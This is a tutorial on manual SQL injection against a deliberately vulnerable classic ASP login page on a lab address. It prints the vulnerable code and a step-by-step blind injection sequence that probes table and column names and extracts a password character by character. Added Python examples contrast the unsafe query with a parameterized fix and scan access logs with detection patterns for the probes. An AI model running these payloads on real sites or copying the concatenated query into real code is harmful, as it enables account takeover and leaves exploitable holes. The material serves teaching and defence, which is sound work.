Manual SQL injection testing
login.html
<html>
<head><title>請登錄</title></head>
<body>
<div align="center">
<form action="login.asp" method="post">
請輸入密碼:<br><br>
用 戶:<input name="name" type="textbox"><br>
密 碼:<input name="pass" type="password"><br>
<input value="登錄" type="submit">
</form>
</div>
</body>
</html>
login.asp
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>登錄</title>
</head>
<body>
<%
inname = Request("name")
inpass = Request("pass")
Set conn = Server.CreateObject("ADODB.CONNECTION")
conn.Open "Provider=microsoft.jet.oledb.4.0; Data Source=" & Server.MapPath("/data.db")
' Vulnerable: the request parameter is concatenated straight into the SQL text.
sqlstr = "SELECT * FROM data Where uname='" & inname & "'"
' With an injected name the statement that actually runs looks like:
' select * from data where name = 'admin' and 1=1 and 'a'='a'
Set rs = conn.Execute(sqlstr)
' Note: if the query returns no rows, rs("pass") raises an error instead of reaching the Else branch.
If inpass = rs("pass") Then
    Response.Write("<h3>登錄成功!</h3>")
    Response.Write("用戶編號:" & rs("uid") & "<br>")
Else
    Response.Write("登錄失敗!")
End If
Set rs = Nothing
conn.Close
%>
</body>
</html>
Parameters: http://192.168.10.1/login.asp?pass=test&name=test
Original SQL statement: SELECT * FROM data Where uname='test'
1. Construct an SQL statement that executes
http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
This is equivalent to executing the SQL statement SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
If this executes successfully, the position of 1=1 is where we can execute SQL of our own.
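The root cause in login.asp is that `inname` becomes part of the SQL text. The following is an added example, not code from the original post: it re-creates that concatenation in Python against an in-memory SQLite stand-in for data.db (the table `data(uid, uname, pass)` and its rows are constructed here), next to the parameterized form a fix would use, so the two can be compared on the step-1 input from the page.

```python
# Added example, not from the original post: the concatenation in login.asp
# re-created in Python against an in-memory SQLite stand-in for data.db
# (table data(uid, uname, pass) and its rows are constructed here), beside
# the parameterized form that a fix would use.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for data.db with the columns login.asp reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE data (uid INTEGER, uname TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO data VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "test", "test")],
    )
    conn.commit()
    return conn


def build_query_unsafe(inname: str) -> str:
    """Same construction as login.asp: the request parameter becomes SQL text."""
    return "SELECT * FROM data WHERE uname='" + inname + "'"


def lookup_unsafe(conn: sqlite3.Connection, inname: str) -> list:
    """Runs the concatenated statement; a quote in inname changes its structure."""
    return conn.execute(build_query_unsafe(inname)).fetchall()


def lookup_safe(conn: sqlite3.Connection, inname: str) -> list:
    """Hardened form: inname is bound as a value, so it can only ever be compared with uname."""
    return conn.execute("SELECT * FROM data WHERE uname = ?", (inname,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for name in ("test", "test' and 1=1 and 'a'='a"):
        print(repr(name))
        print("  unsafe:", len(lookup_unsafe(db, name)), "row(s)")
        print("  safe:  ", len(lookup_safe(db, name)), "row(s)")
```

With `lookup_unsafe`, the second input (the step-1 value from this page) still returns the `test` row because the appended `and 1=1 and 'a'='a'` is parsed as SQL; with `lookup_safe` it returns nothing because the entire string is compared against `uname` as one value. In classic ASP the equivalent fix is an `ADODB.Command` whose `CommandText` is `SELECT * FROM data WHERE uname = ?`, with the value appended through `CreateParameter`, so `inname` never touches the statement text.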
2. Guess the table name
Replace 1=1 with (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
This is equivalent to executing the SQL statement
SELECT * FROM data Where uname='test' and (select count(*) from data)>0 and 'a'='a'
3. Guess the username column
(select count(name) from data)>0
4. Guess the password column
(select count(pass) from data)>0
5. Determine the password length
// check whether the password is longer than 1 character
(Select count(*) from data where name='admin' and len(pass)>1)>0
// check whether the password is longer than 10 characters
6. Guess the password one character at a time
// is the first password character a digit?
(Select count(*) from data where uname='admin' and mid(pass,1,1)<'9')>0
// is the first password character a letter?
(Select count(*) from data where uname='admin' and mid(pass,1,1)>'a')>0
// is the first password character equal to c?
(Select count(*) from data where uname='admin' and mid(pass,2,1)='c')>0
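Every probe in steps 1 to 6 arrives as a query-string value with a distinctive shape (a closing quote followed by `and`, a `select count(` subquery, `mid(` or `len(` calls), which is what a defender can look for in the web server's access log. The following is an added example, not code from the original post: a small triage scan over constructed log lines (client address and timestamps are made up, the combined-log layout with `"GET path HTTP/1.1"` is an assumption) that flags requests whose decoded parameter values match those shapes.

```python
# Added example, not from the original post: a triage check over web-server
# access logs that flags the query-string shapes used in the probes above.
# The log lines, client address and timestamps are constructed; the combined
# log layout ("METHOD path HTTP/x" inside quotes) is an assumption.
import re
from urllib.parse import parse_qs, urlsplit

# Shapes taken from the probes on this page, matched against each decoded parameter value.
SUSPICIOUS = [
    re.compile(r"'\s*and\s+", re.I),              # closing quote followed by a boolean clause
    re.compile(r"\bselect\s+count\s*\(", re.I),   # count(*) subquery used as a true/false test
    re.compile(r"\b(?:mid|len)\s*\(", re.I),      # per-character and length probes
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample: one normal login and the two probe URLs from steps 1 and 2,
# percent-encoded the way a browser sends them.
SAMPLE_LOG = """\
192.168.10.200 - - [10/Oct/2023:12:00:01 +0000] "GET /login.asp?pass=test&name=test HTTP/1.1" 200 512
192.168.10.200 - - [10/Oct/2023:12:00:02 +0000] "GET /login.asp?pass=test&name=test%27%20and%201%3D1%20and%20%27a%27%3D%27a HTTP/1.1" 200 512
192.168.10.200 - - [10/Oct/2023:12:00:03 +0000] "GET /login.asp?pass=test&name=test%27%20and%20(select%20count(*)%20from%20data)%3E0%20and%20%27a%27%3D%27a HTTP/1.1" 200 512
"""


def flag_request(path: str) -> list:
    """Returns the names of query parameters whose decoded value matches a suspicious shape."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    flagged = []
    for key, values in params.items():
        if any(pat.search(v) for v in values for pat in SUSPICIOUS):
            flagged.append(key)
    return sorted(flagged)


def scan_log(text: str) -> list:
    """Returns (line number, flagged parameter names) for every log line with a suspicious request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        flagged = flag_request(m.group(1))
        if flagged:
            findings.append((lineno, flagged))
    return findings


if __name__ == "__main__":
    for lineno, keys in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: suspicious value in parameter(s) {', '.join(keys)}")
```

A real name containing an apostrophe (e.g. `O'Brien`) is not flagged because no `and` follows the quote, but shape matching like this still produces both false positives and misses, and since `Request("name")` in login.asp also reads POST bodies, which most access logs do not record, the scan is a triage aid on top of the parameterized query, not a substitute for it.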
Summary